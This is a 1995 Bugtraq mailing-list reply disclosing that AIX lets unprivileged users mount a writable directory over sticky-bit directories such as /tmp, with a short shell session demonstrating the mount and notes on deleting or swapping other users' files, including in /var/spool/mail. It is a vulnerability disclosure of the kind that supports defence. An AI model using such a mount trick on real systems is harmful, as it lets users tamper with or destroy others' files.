[1623] in bugtraq
Re: nfs_mount in AIX
daemon@ATHENA.MIT.EDU (Aleph One)
Thu Apr 27 02:56:00 1995
Date: Wed, 26 Apr 1995 11:52:42 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
To: Tom Fitzgerald <fitz@wang.com>
Cc: rick@msc.cornell.edu, bugtraq@fc.net
In-Reply-To: <199504260115.AA06504@fnord.wang.com>
Hi playing around with this I found another nasty thing.
Check this out:
$ id
uid=666666(www) gid=4294967294(nobody)
$ ls -ld /tmp
drwxrwxrwt 9 bin bin 2560 Apr 26 09:36 /tmp
$ ls -ld /var/tmp/bah
drwxrwxrwx 2 www nobody 512 Apr 26 09:31 /var/tmp/bah
$ mount /var/tmp/bah /tmp
$ ls -ld /tmp
drwxrwxrwx 2 www nobody 512 Apr 26 09:31 /tmp
$ uname -a
AIX ibm1 2 3 000006693700
$
In other words AIX allows anyone to mount a directory onto a directory
of a file onto a file if the user has a) search permissions to the
directory or file to mount and b) write permissions to the directory
or file to mount over. Also in order the mount a block device, a remote
direcotry or a remote file the process must have root authority. As you
can see the stupid thing never checks the sticky bit in the directory
to mount over! This does not allows us to read the file created on our
mounted directory since they keep the uid.guid of the owner even after we
unmount them, but we can erase the files and maybe fuck around with
a few programs by switching files, etc.... This also includes /var/spool/mail
and any other directories with the sticky bit...
a1
